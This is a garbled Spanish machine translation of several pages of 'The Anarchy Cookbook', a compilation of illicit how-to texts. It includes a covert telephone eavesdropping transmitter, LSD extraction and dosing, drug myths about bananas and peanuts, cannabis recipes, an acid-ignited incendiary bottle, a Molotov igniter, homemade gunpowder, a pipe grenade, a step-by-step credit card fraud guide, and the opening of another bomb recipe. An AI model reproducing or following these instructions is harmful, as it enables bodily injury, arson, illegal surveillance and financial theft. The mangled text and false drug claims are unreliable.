Funcionamiento del circuito: Al no ser el tipo más técnico del mundo, y no ser muy bueno en la electrónica (aún), me limito a repetir lo que el Sr. Iannini dijo sobre el funcionamiento del circuito. El transmisor se compone de un amplificador de alta grano alimenta en las líneas telefónicas a través del transformador. El circuito se inicia por la acción de un impulso transitorio de voltaje que ocurre a través de la línea telefónica en el instante en que se haga el circuito telefónico (el anillo, en otras palabras). Esta transitoria inmediatamente dispara un temporizador cuya salida pasador 3 se hace positiva, encendiendo los transistores Q2 y Q3. Temporizador TM1 ahora permanece en este estado durante un período en función de los valores de R17 y C13 (por lo general alrededor de 10 segundos para los valores que se muestran). Cuando Q3 se activa el temporizador, una simulación de "descolgado" condición es creada por la acción de conmutación de la Q3 de conexión de 500 ohmios de la liquidación del transformador directamente a través de las líneas telefónicas. Al mismo tiempo, las abrazaderas Q2 el suelo de la A1, amplificador, y Q1, el transistor de salida, con el retorno negativo de B1, B2, por lo tanto, la habilitación de esta sección del amplificador. Nótese que B2 es siempre necesaria mediante el suministro de energía en reposo a TM1 en condiciones normales. El sistema está apagado / encendido controlado por S1 (switch). Un micrófono de cristal recoge los sonidos que se alimentan a los dos primeros transistores de la matriz A1 conectado como un seguidor de emisor conducir los otros dos transistores en cascada como emisores comunes. La producción de la matriz ahora conduce Q1 capacitivamente acoplados al arrollamiento 1500 ohmios de T1. R7 controla el recoger la sensibilidad del sistema. El diodo D1 está polarizado en el instante de conexión y, esencialmente, se aplica un pulso negativo en la patilla 2 de TM1, iniciando el ciclo. Abrazaderas D2 cualquier impulsos positivos altos. C9 DC-aísla

Page 233: 106652012 the Anarchy Cookbook 2000 Es

y desensibiliza el circuito. El sistema descrito debe funcionar cuando todas las llamadas entrantes se hace sin que suene el teléfono.

Diagrama esquemático: Debido a que este es un texto, esto no se ve demasiado caliente. Por favor, use un poco de imaginación! Que se espera obtener un dibujo de gráficos de esta tan pronto como me sea posible en un graffile Fontrix.

Para poder ver lo que todo lo que es, a este personaje: | debe aparecer como una barra horizontal. Lo hice en un] [e utilizando a] [* 80 tarjeta de columna, así que lo siento si se ve un poco extraño para usted.

Símbolos: Resistencia: - / \ / \ / - Interruptor: _ / _ de la batería: -! | | - condensador (electrolítico): - | (- condensador (disco): - | | - __ transistor: (c)> (e) Transformador:) | | ( \ _ /) | | ( | (B) _) | | (_ diodo: | < chip:. _____. ! _____! (Chips son fáciles de reconocer!)

Los puntos implica una conexión entre los cables. NO DOT, no hay conexión.es decir: _ _: una conexión al mismo tiempo _ | _ significa que no hay conexión.!.-------------------------------------------------- ------------------------- + -

. ________________________to Cable VERDE de la línea telefónica||. ______________________to Cable ROJO de la línea telefónica| || |. _________ (M1) ______________.| | | || | | R1 || |! __________ / \ / \ / ____________!| | |! _ _ C1| | | Este cable es el amplificador ___| | | <= Tierra | R2| | |! ___________________ / \ / \ / _____________.| | |. _______ _______!. || |! ___________________ 4 9 11 _____________________________!| | | | | || |! ___________________ 7 12._____________________________!| | | | | R3 A1 || |! ___________________ 10 ____ * 8 _______.____ / \ / \ / ____________!| | | | / | | || | | C4 | / | \ | 2 mA| |! ____ | | ______. | / | / B1 R4 +| | | | | | | / | \ || | | R7 | C2 | / | / || |! ____ / \ / \ / ___ __) |! __ 8 * _ / | | S1 || | | ^ | 6 | _______! neg <__ / .__!| | | | C3 | | | C5 devolución || | | _____ | (___.__ 3 |! '- | (- | || | | | | 5 1 ____________! || | | \ _______._______! | B2 || |! ________. R8 / | | +| | | \ | | R6 | 3 mA| | |! __________ ____________________ |! _____ / \ / \ / ______!| | | R5 | | || |! __ / \ / \ / ___________ | ____________________! || | | | || | | | || | | C6 | |

Page 234: 106652012 the Anarchy Cookbook 2000 Es

| | | | -) | - 'R9 || | | _________________ / \ / \ / _______. || | | | | || | | Q1 _ _ |! R10 || |! ____________ / \ ____________________________ __ / \ / \ / _____!| | | | || | | | || | | C8 | || |! __________) | _______________________________ | ____________!| |! | || | / | || | ----- | | || | | \ | || | |> | || | | | | || | | | | || | |! _____________. | || | | | | || |! __________. | | || | | | | ||! ________. | |. _____! || | | | | || | | | | || | | | | C7 || | | | '- | (- | || | _________ | _________ _______.T1._________________! | || | | 1500) | | (500 || | | Ohm) | | (ohmios || |! ______) |. | (__.. || | | | || | | | || | |> || | | | / || | | + ---- | Q3 || | | | | \ |! ____________________ | _________ | _______ | __ ______!. D1 C9 | | | | '- | <--- | (------ | | . ______________! | | | | | | | | | |. ________________! | | | | | | | | \ |. ________________! C11 | | / | |. ___ | | ____________! | R13 \ | | | | | | | / | | | | | \ ___.___ |! _______________________! | | | | | | | R16 | R15 | | V | |! ___ / \ / \ / \ ________ ___ / \ / \ / _! | Neg | | | D2 | | | Volver | |! _____ | <__________! | | B1, B2 | \ | | | | | / |. ____________ _!. | | | \ R14 | C12 | TM1 2 | | | |! / _ | | _ 5 4 _______! | | \ | | | | | | | | |! ____ 1 8 _______! | | | | | 7 6 3 | | | | | |! _____._.____._! | | | | | | | | | | | | | C13 | | | R17 | | | |! ___) | _ _____ ____ |! __ / \ / \ / __! | | | | | | ! ___________ | ___ _______________________ | _________________! |

Page 235: 106652012 the Anarchy Cookbook 2000 Es

| | | | | \ | C10 | | / __________ R18) |! _______________! | \ | / | | ! ___O J1 el sentido de salida

Notas de la construcción: Debido a que el maldito libro acaba de dar una imagen en lugar de instrucciones paso a paso, y voy a tratar de darle toda la ayuda posible. Tenga en cuenta que todas las partes que se utilizan están claramente identificados en el esquema. El perfboard, perillas, 'clips cocodrilo, etc son opcionales. Le sugiero encarecidamente que usted hace uso de la tarjeta! Esto hará que el cableado de los componentes hasta mucho, mucho más fácil que si no lo uso. El mando se puede utilizar para controlar el bote (R7). R7 se utiliza para ajustar la TI de manera que se suena de forma correcta a través del teléfono. (Tienes la oportunidad de determinar lo que suena bien) Al cambiar el valor de C13, se puede cambiar la cantidad de tiempo que el circuito permanecerá abierta (no se puede detectar un cuelgue, por lo que funciona con un temporizador.) Un valor de 100 micro Faradios aumentará el tiempo por alrededor de 10 veces. El conmutador (S1) determina si o no la unidad está en funcionamiento. Cerrado está encendido. Abierto está apagado. El rendimiento negativo es el positivo y negativo de la batería! Las baterías se verá algo como esto cuando está conectado:

<-V_____. . ______. . _____. . ____-> | | | | | | ___ __ __ | ¡|! __ ___ __ | + - | _ / _! | + - | | | Interruptor ^ | | | | | | 9Voltios 9Voltios | ! _______! retorno neg! _______!

Para conectar esto a la línea telefónica, hay tres formas, dependiendo de qué tipo de conector que tiene. Si es el tipo de edad (no modulares), entonces usted puede simplemente abrir la placa de pared y conecte los cables del transmisor directamente a los terminales del teléfono.

Si usted tiene una conexión modular con cuatro puntas, coloque la roja a la vertiente negativa (no me pregunten cuál es cuál! Yo no tengo ese tipo de conector ... sólo he visto en las tiendas), y el verde a la vertiente positiva, y el plug in Trate de no producirse una descarga eléctrica ...

Si usted tiene el clip-en el tipo de conector, consigue doble cordón de extensión masculino (uno con un clip en cada extremo), y cortar un clip. Obtener un cuchillo afilado y el empalme de la material de protección gris. Usted debe ver a cuatro hilos, entre ellos uno verde y uno rojo. Usted conectar los cables adecuados de las TI de estos dos, y conecte el otro extremo en la pared.

Conseguir la TI para trabajar: Si le sucede que tiene un problema, usted debe tratar de hacer lo siguiente (se trata de normas de sentido común!) Asegúrese de que usted tiene la polaridad de todos los condensadores de la derecha (si se utiliza condensadores polarizados, que es). Asegúrese de que toda la soldadura se hace bien y no tiene algo que un cortocircuito accidental (por ejemplo, si usted tiene un pegote de tocar dos cables que no se debe tocar.) Verifique que otros cortocircuitos. Compruebe si la batería está en la derecha. Asegúrese de que el interruptor está cerrado. Si aún así no funciona, mándenme una línea en uno de los Maryland o Virginia BBS y voy a tratar de ayudarle.

La salida de sentido: un modo u otro, es posible conectar algo más a este y que se active por teléfono (como una alarma, las luces intermitentes, etc)

158.LSD de The Jolly Roger

Page 236: 106652012 the Anarchy Cookbook 2000 Es

Creo que, de todos los medicamentos en el mercado negro de hoy, el LSD es la más extraña. Es la droga principal más reciente de venir a la vida en la subcultura psicodélica. (Bla bla bla ... vamos a llegar a las cosas buenas: Cómo tener éxito en su cocina!)

1. Triturar hasta 150 gramos de semillas de Morning Glory o Hawaiian Baby madera de semillas de rosas.

2. En 130 cc. de éter de petróleo, remojar las semillas durante dos días.3. Se filtra la solución a través de una pantalla estrecha.4. Deseche el líquido, y permitir que la pasta de las semillas que se seque.5. Durante dos días, permitirá la pasta en remojo en 110 cc. de alcohol de madera.6. Filtrar la solución una vez más, el ahorro del líquido y que eso es "1".7. Resoak la pasta en 110 cc. de alcohol de madera durante dos días.8. Filtrar y tirar la pasta.9. Añadir el líquido de la segunda inmersión a la solución "1".10. Vierta el líquido en una bandeja de horno y deje que se evapore.11. Cuando todo el líquido se haya evaporado, una goma de color amarillo se mantiene.

Esto debe ser raspada y poner en cápsulas.

• 30 gramos de semillas de Morning Glory = 1 viaje• 15 semillas de rosas de madera hawaiana = 1 viaje

Muchas empresas, como Northrop-King ha sido recubrimiento sus semillas con un producto químico tóxico, el cual es un veneno. Semillas Comprar de un mayorista, ya que es mucho más seguro y más barato. La madera de Hawai aumentó semillas se pueden pedir directamente a:

Viveros y Flores ChongP.O. Caja 2154Honolulu,Hawai

DOSIS LSD

Las dosis de ácido básicos varían según el tipo de ácido que está disponible y qué medio de ingestión se utiliza. Químicamente, la potencia de LSD-25 se mide en microgramos o micrófonos. Si usted es químicamente mente o hacer su propio ácido, a continuación, calcular el número de microgramos es muy importante. Por lo general entre 500 y 800 micrófonos es suficiente para un viaje de 8 horas, dependiendo de la calidad del ácido, por supuesto. He oído hablar de las personas que toman tanto como 1,500-2,000 micrófonos. Esto no sólo es extremadamente peligroso, es extremadamente derrochador.

El LSD viene empaquetado en muchas formas diferentes. Los más comunes son los siguientes:

1. La mancha marrón, o un trozo de papel con una gota de LSD se secó sobre él, está siempre alrededor. Por lo general, un punto equivale a un viaje.

2. Ácido encapsulado es muy complicado, ya que la tapa puede ser casi cualquier color, tamaño o potencia. Siempre pregunte lo que el ácido se corta con, como una gran cantidad de ácido se corta con la velocidad o la estricnina. Obsérvese también la dosificación.

3. Las pequeñas tabletas blancas o de color se ha sabido que contienen ácido, pero, como con el ácido encapsulado, es imposible saber la potencia, sin pedir permiso.

159.Bananas de The Jolly Roger

Lo creas o no, los plátanos contienen una pequeña cantidad de _Musa sapientum bananadine_, que es una enfermedad leve, de corta duración psicodélico. Hay maneras mucho más fáciles de conseguir alta, pero la gran ventaja de este método es que los plátanos son legales.

Page 237: 106652012 the Anarchy Cookbook 2000 Es

1. Obtener 15 libras. de los bananos maduros de color amarillo.2. Pelar las 15 libras. y comer la fruta. Guardar las cáscaras.3. Con un cuchillo filoso, raspe el interior de las cáscaras y guardar el material

removido.4. Ponga todo el material de raspado en una olla grande y agregar el agua. Hervir

durante tres o cuatro horas hasta que se alcance una consistencia de pasta sólida.5. Extienda esta pasta sobre las bandejas para hornear, y seco en un sobre durante

unos 20 minutos a una hora y media. Esto dará lugar a un polvo fino de color negro. Hace alrededor de una libra de polvo bananadine. Por lo general, uno se sentirá los efectos de bananadine después de fumar tres o cuatro cigarrillos.

Tabla de PesosLibras Onzas Gramos Kilos1 16 453,6 0,45360,0625 1 28,35 0,02830,0022 0,0352 1 0,0012,205 35,27 1000 1

160.Yummy Marihuana Recetas de The Jolly Roger

Acapulco Verde• 3 aguacates maduros• ½ taza de cebolla picada• 2 cucharaditas de chile en polvo• 3 cucharadas de vinagre de vino• ½ taza de marihuana (hierba)

Mezcle el vinagre, hierbas y chile en polvo juntos y dejar reposar la mezcla durante una hora. A continuación, agregue el aguacate y la cebolla y puré de todo junto. Se puede servir con tacos o como dip.

Olla de sopa• 1 lata de caldo de carne condensada• 3 cucharadas de la hierba• 3 cucharadas de jugo de limón• ½ lata de agua• 3 cucharadas de berros picados

Combine todos los ingredientes en una cacerola y llevar a ebullición a fuego medio. Coloque en el refrigerador por dos o tres horas, calentar y servir.

Pork and Beans y Pot• 1 lata grande (1 lb 13 oz) de cerdo y frijoles• ½ taza de la hierba• 4 rebanadas de tocino• ½ taza de melaza de la luz• ½ cucharadita de sal de nogal• 3 rodajas de piña

Mezcle en una cacerola, cubrir la parte superior con la piña y el tocino, al horno a 350 º durante unos 45 minutos. Sirve eso de las seis.

La pelota de carne• £ 1 hamburguesa• ¼ de taza de cebolla picada• 1 lata de crema de champiñones• ¼ de taza de miga de pan• 3 cucharadas de la hierba• 3 cucharadas de India saborear

Page 238: 106652012 the Anarchy Cookbook 2000 Es

Mezclar todo esto y la forma en bolas de carne. Brown en una sartén y escurrir. Colocar en una cacerola con la sopa y ½ taza de agua, tapar y cocinar a fuego lento durante unos 30 minutos. Feeds de unas cuatro personas.

Salsa de espagueti• Tomate, 1 lata (6 oz) de pasta de• 2 cucharadas de aceite de oliva• ½ taza de cebolla picada• ½ taza de la hierba• 1 pizca de pimienta• 1 lata (6 oz) de agua• ½ diente de ajo picado• 1 hoja de laurel• 1 pizca de tomillo• ½ cucharadita de sal

Mezclar en una olla grande, cubra y cocine a fuego lento, agitando con frecuencia de dos horas. Sirva sobre el espagueti.

Pan Pot• 1 cebolla paquete de mezcla para sopa• 1 (16 oz.) Todo puede tomates pelados• ½ taza de la hierba• 2 lbs. carne molida de res o de pollo o pavo• 1 huevo• 4 rebanadas de pan, se derrumbó

Mezcle todos los ingredientes y la forma en un pan. Hornear durante una hora en el horno 400 °. Sirve eso de las seis.

Chili Bean Pot• 2 lbs. frijoles pintos• £ 1 tocino, cortadas en secciones de dos pulgadas• 2 tazas de vino tinto• 4 cucharadas de chile en polvo• ½ diente de ajo• 1 taza de pasto picado• ½ taza de champiñones

Remojar los frijoles durante la noche en agua. En una olla grande vierta agua hirviendo sobre los frijoles y cocine a fuego lento durante al menos una hora, añadiendo más agua para mantener los frijoles cubiertos. Ahora agregue los demás ingredientes y continuar a fuego lento durante otras tres horas. Sal al gusto. Sirve unos diez años.

Pájaro Relleno• 5 tazas de migas de pan de centeno• 2 cucharadas de condimento para aves• ½ taza de cada una de las pasas y almendras• ½ taza de apio• 1/3 taza de cebolla picada• 3 cucharadas de mantequilla derretida• ½ taza de la hierba• 2 cucharadas de vino tinto

Mezcle todo junto, y luego meterlo in

Pot de Apple

Page 239: 106652012 the Anarchy Cookbook 2000 Es

• 4 manzanas (sin semillas)• ½ taza de azúcar morena• ¼ taza de agua• 4 cerezas• 1/3 taza de hierba picada• 2 cucharadas de canela

Polvo de la hierba en una licuadora, mezclar la hierba con el azúcar y el agua. Rellene núcleos con esta pasta. Espolvorear las manzanas con canela, y la parte superior con una cereza. Hornear durante 25 minutos a 350 °.

Pot Brownies• ½ taza de harina• 3 cucharadas de manteca• 2 cucharadas de miel• 1 huevo (batido)• 1 cucharada de agua• ½ taza de la hierba• pizca de sal• ¼ de cucharadita de polvo para hornear• ½ taza de azúcar• 2 cucharadas de jarabe de maíz• 1 plaza de chocolate derretido• 1 cucharadita de vainilla• ½ taza de nueces picadas

Tamizar la harina, polvo de hornear y la sal. Mezclar manteca, azúcar, miel, jarabe, y el huevo. A continuación, se mezclan en el chocolate y otros ingredientes, y mezclar bien. Corre en una cacerola de 8 pulgadas y hornee durante 20 minutos a 350 °.

Pan de plátano• ½ taza de manteca• 2 huevos• 1 cucharadita de jugo de limón• 3 cucharaditas de polvo para hornear• 1 taza de azúcar• 1 taza de puré de banano• 2 tazas de harina cernida• ½ taza de la hierba• ½ cucharadita de sal• 1 taza de nueces picadas

Mezclar la manteca y el azúcar, batir los huevos y agregue a la mezcla. Por separado mezcle los plátanos con jugo de limón y agregar a la primera mezcla. Tamizar la harina, la sal y el polvo de hornear juntos, luego mezclar todos los ingredientes juntos. Hornear durante 1 ¼ horas a 375 °.

Galletas de sésamo Semillas• 3 oz suelo semillas de sésamo tostado• 3 cucharadas de almendras molidas• ¼ de cucharadita de nuez moscada• ¼ de taza de miel• ½ cucharadita de jengibre molido• ¼ cucharadita de canela• ¼ oz hierba

Page 240: 106652012 the Anarchy Cookbook 2000 Es

Tostar el césped hasta que esté ligeramente marrón y luego triturarla en un mortero. Mezclar la hierba triturada, con todos los demás ingredientes, en una sartén. Colocar una sartén a fuego lento y agregar 1 cucharada de mantequilla salada. Deje que se cocine. Cuando esté fría, la mezcla de rollo en bolitas y pasarlas a las semillas de sésamo.

Si usted sucede estar en el país en un lugar donde se cultiva marihuana, aquí está una de las grandes recetas que puedes probar. Elige una hoja de tamaño medio fuera de la planta de marihuana y sumergirla en una taza de mantequilla de dibujado, agregue la sal, y comer.

161.Peanuts de la Jolly Roger

Pruebe esto en algún momento cuando te aburras!

1. Tome una libra de maní crudo (sin tostar!)2. Shell ellos, salvar la piel y el descarte las conchas.3. Comer los frutos secos.4. Triturar hasta las pieles y el rollo de ellos en forma de cigarrillo y el humo!

Te divertirás, ¡créeme!

Botella Fuego 162.Chemical por la Jolly Roger

Esta botella incendiaria es de encendido automático en el impacto de destino.

Materiales necesariosMaterial Cómo se utiliza Fuente ComúnÁcido Sulfúrico Baterías de Almacenamiento Vehículos de Motor Procesamiento de materiales Plantas IndustrialesGasolina Motor de combustible Gasolinera Vehículos de MotorClorato de potasio Medicina Tiendas de drogasAzúcar Los alimentos edulcorantes Almacene los alimentos

• Botella de vidrio con tapón (más o menos el tamaño de un cuarto de galón)• Pequeña botella o frasco con tapa.• Trapo o papel absorbente (toallas de papel, periódico)• De cadenas de goma o bandas

Procedimiento:1. El ácido sulfúrico se debe concentrar. Si el ácido de batería o ácido diluido otro

se utiliza, se concentran por ebullición hasta densos humos blancos se desprenden. Recipiente utilizado para hervir debe ser de esmalte-mercancías o de vidrio del horno.

ATENCION: El ácido sulfúrico se quema la piel y destruir las prendas de vestir. Si alguno se derrama, lavar con una gran cantidad de agua. Los humos son también muy peligroso y no debe ser inhalado.

2. Eliminar el ácido del calor y dejar enfriar a temperatura ambiente.3. Vierta gasolina en la botella de cuarto grande 1 hasta que es aproximadamente 1/3

de su capacidad.4. Añadir ácido sulfúrico concentrado a la gasolina lentamente hasta que la botella

está llena hasta dentro de 1 "a 2" de arriba. Coloque el tapón en la botella.5. Lavar el exterior de la botella completamente con agua limpia.

PRECAUCIÓN: Si no se hace esto, la botella de fuego puede ser peligroso de manejar durante el uso!

6. Envolver un paño limpio o varias hojas de papel absorbente alrededor de la parte exterior de la botella. Ate con una cuerda o sujételo con bandas de goma.

Page 241: 106652012 the Anarchy Cookbook 2000 Es

7. Disolver ½ taza (100 gramos) de clorato de potasio y ½ taza (100 gramos) de azúcar en una taza (250 cc) de agua hirviendo.

8. Deje que la solución para enfriar, verter en el frasco pequeño y tapa. La solución enfriada debe ser de aprox. 2/3 cristales y líquidos 1/3. Si no hay más que esto, se vierte el exceso antes de usar.

PRECAUCIÓN: Guarde la botella por separado de la otra botella!

Cómo utilizar:1. Agite la botella pequeña para mezclar el contenido y verter sobre la tela o de

papel alrededor de la botella grande. Botella se puede utilizar en húmedo o después de solución se seca. Sin embargo, cuando se seca, la mezcla de clorato de potasio con azúcar es muy sensible a chispas o llamas y deben ser tratados en consecuencia.

2. Tirar o lanzar la botella. Cuando la botella se rompe contra una superficie dura (objetivo) que el combustible se inflame.

163.Igniter de Partidos libro del Jolly Roger

Se trata de un encendedor caliente hecha de los partidos de libros de papel para su uso con cóctel molotov y bombas incendiarias otras.

Material necesario:• Libro de papel coincide con• Adhesiva o cinta aislante

Procedimiento:1. Quite la grapa (s) del libro de partido y los partidos independientes de la

cubierta.2. Doble y la cinta de una fila de resultados (veces en tres partes)3. Forma la cubierta en un tubo con superficie de impacto en el interior y cinta.

Asegúrese de que la cubierta de la carpeta se ajusta firmemente alrededor de las cabezas de las cerillas grabadas. Deje la tapa abierta en el extremo opuesto para la inserción de los partidos.

4. Empuje los partidos grabados en el tubo hasta que los extremos inferiores se exponen alrededor de 3/4 de pulgada (2 cm)

5. Aplanar y doblar el extremo abierto del tubo de modo que más vueltas alrededor de 1 pulgada (2 - ½ cm); cinta en su lugar.

Se utiliza con un cóctel molotov:1. Pega el "partido de la lengueta del final" de la ignición en el cuello de la bomba

molotov.2. Tome el "encubrimiento y la ficha" y tire con fuerza y rapidez para encender.

Uso General:

El encendedor partido libro puede ser utilizado por sí mismo para encender líquidos inflamables, los cables de los fusibles y elementos similares que requieren de encendido en caliente.

PRECAUCIÓN: Guarde los fósforos y encendedores terminados en recipientes resistente a la humedad, como el caucho o plástico hasta que esté listo para su uso. Fósforos de papel húmedas o mojadas libro no se enciende.

164. "Polvo rojo o blanco", propulsor de la Jolly Roger

"Polvo rojo o blanco" propulsor puede ser preparado de una manera sencilla, segura. La formulación se describe a continuación se traducirá en aproximadamente 2 libras y media de polvo. Se trata de un propulsor de armas pequeñas y sólo debe ser utilizado en armas con ½ pulgada de diámetro o menos (pero no las pistolas!).

Material necesario:

Page 242: 106652012 the Anarchy Cookbook 2000 Es

• Fuente de calor (cocina o chimenea)• 2 cubo de metal galones• Medición de taza (8 onzas)• Cuchara de madera o una espátula de caucho• Chapa o lámina de aluminio (por lo menos 18 cm cuadrados)• Pantalla de la ventana plana (al menos 1 pie cuadrado)• Nitrato de Potasio (granulada) 2-1/3 tazas• Azúcar blanco (granulado) 2 tazas• Óxido de hierro en polvo (óxido) 1/8 taza (si está disponible)• El agua clara, 1 - ½ tazas

Procedimiento:1. Coloque el azúcar, el nitrato de potasio, y agua en el cubo. El calor con un fuego

lento, revolviendo ocasionalmente hasta que el azúcar y nitrato de potasio se disuelva.

2. Si está disponible, agrega el óxido de hierro (herrumbre) a la solución. Aumentar la llama en la mezcla hasta que hierva suavemente.

NOTA: La mezcla se conservan la coloración óxido.

3. Remover y raspar los lados del cucharón de vez en cuando hasta que la mezcla se reduce a una cuarta parte de su volumen original, después revuelva continuamente.

4. Al evaporarse el agua, la mezcla se vuelva más grueso, hasta que alcance la consistencia de los cereales para el desayuno cocido o chocolate hechas en casa. En esta etapa de espesor, quitar el cubo de la fuente de calor, y extender la masa en la hoja de metal.

5. Mientras que el material se enfría, se marcará con una cuchara o espátula en entrecruzadas surcos alrededor de 1 pulgada de distancia.

6. Permitir que el material a secar, preferiblemente en el sol. Medida que se seca, restaurarlo en consecuencia (más o menos cada 20 minutos) para acelerar el secado.

7. Cuando el material se ha secado a un punto en que es húmeda y suave pero no pegajosa al tacto, colocar una cucharada pequeña en la pantalla. Frote el material de un lado a otro en contra de la malla de la pantalla con una cuchara u otro objeto plano hasta que el material es granulado en pequeñas partículas similares a gusanos.

8. Después de la granulación, devolver el material al sol para que se seque por completo.

165.Pipe granada de mano por la Jolly Roger

Las granadas de mano se puede hacer de un pedazo de tubo de hierro. El relleno puede ser de explosivo militar plástico o granular, explosivo improvisado, o el propulsor de la escopeta o munición para armas pequeñas.

Material necesario:• Tubería de hierro, extremos roscados, 1 - ½ "a 3" de diámetro, 3 "a 8" de largo.• Dos (2) de tubería de hierro las tapas• Explosivos o el propulsor• Tapa de voladura no eléctrica (comercial o militar)• Fusible del cable• Taladro de mano• Alicates

Procedimiento:1. Lugar detonador en un extremo del cordón de mecha y engarce con los alicates.

NOTA: Para saber el tiempo que el cordón de mecha debe ser, comprobar el tiempo que tarda una longitud conocida para quemar. Si las quemaduras 12 pulgadas en 30 segundos, un cable de 6 pulgadas, se encenderá la granada en 15 segundos.

Page 243: 106652012 the Anarchy Cookbook 2000 Es

2. Tornillo casquillo de la pipa a un extremo de la tubería. Coloque el cable con fusible detonador en el extremo opuesto de modo que el detonador está cerca del centro de la tubería.

NOTA: Si explosivo plástico se va a utilizar, llenar tubería antes de la inserción de detonador. Introduzca un palo redondo en el centro de la explosión para hacer un agujero y luego inserte el detonador.

3. Vierta explosiva o propulsora en el tubo un poco a la vez. Toque en la base de la tubería con frecuencia para resolver de relleno.

4. Haga un agujero en el centro de la tapa del tubo de montar lo suficientemente grande como para que el cable pase a través de un fusible.

5. Limpie las roscas para eliminar cualquier material de relleno. Deslice la tapa del tubo perforado en el lado del fusible y el tornillo apretado en el tubo.

166.European Fraude de tarjetas de crédito por Creditman!

Reino Unido el fraude de tarjetas de crédito es mucho más fácil que otra vez en los Estados Unidos. Los mismos elementos esenciales básicos 3 se necesitan:

1. Una casa de seguridad.2. Números de tarjetas de crédito con Exp. la fecha y la dirección.3. Los buenos proveedores de productos próximos día del parto.

La casa de seguridadLa casa de seguridad debe estar en la planta baja, para no cabrear al repartidor cuando se trata de dejar a su equipo recién robado. Si tiene que ir hasta 10 vuelos en una inmersión completa y unos 14 años de edad, los signos de un niño A2000 entonces él va a extrañar! Asegúrese de que no hay vecinos entrometidos, una buena zona está llena de yuppies cos de uno, todos van a trabajar durante el día. Casas de seguridad se suelen obtener mediante el pago de un mes de alquiler por adelantado o poner un depósito de, digamos, $ 200. O eso, o entrar en un lugar y utilizar eso.

Números de tarjetas de créditoEl número de tarjeta, fecha de caducidad, fecha de inicio (si es posible), el nombre completo (incluyendo la inicial del segundo), número de teléfono y dirección completa con código postal son ideales. Si sólo se puede obtener el SirName, y el código postal que no, usted no debe tener ningún tipo de molestia real. Sólo decir que se mudó recientemente a su nueva dirección. Número de teléfono es muy útil, si se acaba de anillos y anillos, pero si no es así, entonces asegúrese de que el ex-directorio. Usted no puede salirse con la suya dándoles un número de teléfono mierda. Algunas empresas quieren quisquillosos números de teléfono sólo para cotejar el Cardnet, pero en general no es necesario. En resumen, he aquí una rápida lista de control:

1. Número de tarjeta y fecha de caducidad.2. Nombre y dirección del titular de la tarjeta.3. Nombre / iniciales (OPCIONAL)4. Fecha de inicio (OPCIONAL)5. Código postal (OPCIONAL)6. Teléfono (opcional)

Si usted tiene todas las 6, entonces usted no debe tener ningún tipo de molestia. Fecha de inicio es el elemento más raro que se puede pedir para, código postal y las iniciales de ser más común. Si te estás perdiendo 3-6, entonces usted necesita un cojonudo con facilidad de palabra hijo de puta en la línea de teléfono!!

La OrdenNo todo el mundo puede pedir $ 1000 de cosas - que no es fácil. Usted tiene que ser fresco, suave y tiene algunas buenas respuestas a sus preguntas. Te aconsejo que sólo pedir hasta $ 500 el valor de cosas de una sola vez, pero si usted tiene los detalles 1-6 y el número de teléfono no se contestó desde 9 a 5.30 pm luego subir a $ 1000

Page 244: 106652012 the Anarchy Cookbook 2000 Es

(asegurarse de que es una tarjeta de oro!). Cuando esté preparado para ordenar asegúrese de tener al menos 3 veces la cantidad de proveedores que usted necesita, por ejemplo si quieres a la tarjeta de 5 discos duros, asegúrese de que tiene 15 proveedores. Una gran parte del tiempo, que se sitúan fuera de stock, no se puede hacer entrega al día siguiente o no se entrega a una dirección diferente. Lista de comprobación rápida de lo que debe preguntar antes de entregar el número:

1. Entrega al día siguiente, ¿de acuerdo?2. Ordenó a la dirección diferente a la tarjeta, ¿de acuerdo?3. ¿Tiene producto en stock (bastante obvio, ¿eh?)

Asegúrese de hacer todas estas preguntas antes de entregar su número precioso.

ExcusasExcusas usuales para una dirección diferente es que es un regalo o estás en viaje de negocios aquí para las próximas 5 semanas de edad, etc Cualquier mierda ¿por qué no va a ir a la dirección correcta.

¡ADVERTENCIA! Las facturas! ¡ADVERTENCIA!Las facturas se envían en ocasiones con el paquete real, sino que también se envían a los propietarios de tarjetas (¿por qué crees que necesitan la dirección?) Por lo que usar una casa de seguridad de más de 2 días es arriesgado. Un disparo de un día es seguro, si se contagian de entonces dejaran de los bienes antes de obtener una orden de allanamiento.

Límites de CréditoLos límites en las tarjetas de acceso desde $ 500 a $ 4000 en tarjetas de oro. Su promedio de tarjetas será de unos $ 1000 - $ 1500. Se toma un tiempo para construir un buen historial de crédito a fin de que los límites de las grandes, así que no creo que cada tarjeta tendrá 12 IBM 386 de! Visa y Access se utilizan siempre - American Express, etc son inútiles.

• Acceso = Eurocard, Mastercard (se inicia con 5)• Visa = (comienza con 4, 16 dígitos es un Oro)

Una regla general es, confirme la orden de hacer que el crédito que se haga efectivo. A medida que el mes pasa, el crédito se ha agotado - los malos tiempos son del 27 - 3 º que es cuando todas las facturas entrar mejor hora para la tarjeta es de alrededor de 11 o 12, cuando el pobre hombre ha pagado su última factura por lo que puede funcionar hasta una nueva (je, je, je!).

Ideal artículos a la tarjetaEl mejor material es siempre duro de la computadora-ware, ya que el día siguiente. Amigas, ST, PC - nada realmente. Los discos vírgenes son una pérdida de tiempo, son muy pesados. Discos duros externos, monitores - lo bueno, básicamente. No solicite ningún mierda como grabadora de vídeo, Hi-Fi, vídeo-cámaras, teclados musicales, programas informáticos, jewerely ni nada menos de $ 300. Usted encontrará los elementos de la lista son difíciles de obtener la entrega al día siguiente y por lo general no va a entregar a una dirección diferente - hijos de puta, ¿eh? Estás perdiendo el tiempo con los pequeños artículos de menos de $ 300, tratar de mantener las entregas de menores de 10 años al día.

La caída - Dos formas de hacer el descenso

1. Registrarse para todo el equipo (asegúrese de que usted está allí entre las 9.00 y 17:30)

2. No suba hasta alrededor de 18:30 y recoger todas las cartas que el hombre ha dejado de entrega. Estos por lo general dicen 'usted no estaba en el momento que podría XX puede hacer los arreglos nuevo tiempo para la entrega o recogida en nuestro almacén. En ese caso, la mierda a la estación y obtener todo el equipo (se necesita un gran coche!).

Recuerde, cardado es kiddies ilegal, así que no te pillen.

Page 245: 106652012 the Anarchy Cookbook 2000 Es

Bomba 167.Potassium por Exodus

Este es uno de mis favoritos. Esto crea un explosivo muy inestable en un recipiente muy estable. Usted necesitará:

1. Una botella de dos extremos. Estos son un poco difíciles de encontrar, tienes que mirar a su alrededor, pero si usted no puede encontrar uno, usted necesitará un recipiente similar en el que hay dos partes totalmente separadas que son herméticos y accesible en los extremos, de esta manera:

! Hermética separación!________________ _________________

| | |/ | \

---- | ----| C | | | c |

| A | | | a | | ___p | | | __p_ |

\ | /| | |

----------------- | ------------------

